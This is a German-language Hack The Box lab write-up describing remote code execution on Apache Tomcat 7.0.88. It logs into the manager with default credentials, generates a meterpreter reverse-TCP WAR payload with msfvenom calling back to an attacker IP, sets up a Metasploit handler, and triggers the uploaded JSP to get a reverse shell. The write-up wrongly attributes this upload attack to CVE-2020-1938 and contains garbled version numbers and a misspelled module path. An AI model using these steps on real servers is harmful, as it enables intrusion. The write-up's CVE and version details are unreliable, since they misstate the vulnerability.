
Schritt-für-Schritt-Anleitung zur Ausnutzung von CVE-2020-1938 (Apache Tomcat beliebiges JSP-Upload zu RCE) mit msfvenom und Metasploit in einer Hack The Box Laborumgebung.
CVE-2020-1938 ist eine kritische Schwachstelle, die Apache Tomcat von 9.0.0.M1 bis 9.0.0.30, 8.5.0 bis 8.5.50 und 7.0.0 bis 7.0.99 betrifft. ⚠️ Dies wurde in einem Hack The Box Labor ausgenutzt.
🔗 Referenz: NIST NVD Eintrag
Die Website hat Standard-Anmeldedaten für die Funktion Server Status.
Diese Oberfläche zeigt an, dass die Version Apache Tomcat/7.0.88 ist, 64-Bit-Architektur.
Von dieser Oberfläche aus navigieren wir zur Auflistung von Anwendungen, die eine Upload-Funktion für .war-Dateien bereitstellt.
Bei erfolgreichem Upload wird die .war-Datei unter /directory/filename ausgeführt.
Die Recherche zur Apache Tomcat-Version bestätigte die Anfälligkeit für CVE-2020-1938
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
Mit msfvenom, einem Metasploit-Payload-Generator, erzeugen wir unseren exploit.war-Payload.
Nach der Dateigenerierung öffnen Sie die Datei und finden Sie den Namen der .jsp-Datei, z.B. gcvxdtmxvw.jsp, und speichern Sie ihn für später.
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004
Mit msfconsole richten wir einen Listener ein, der auf die Ausführung unseres Payloads wartet.


Wir laden unsere Datei im Bereich 'Deploy' hoch, danach aktualisieren wir den Bildschirm und sehen, dass die Datei erfolgreich hochgeladen wurde. Um den Exploit abzuschließen, müssen wir zum Pfad ip/hacked/gcvxdtmxvw.jsp navigieren.

Dies hält die Anfrage an, jedoch können wir lokal auf unserem Rechner sehen, dass eine Reverse-Verbindung hergestellt wurde.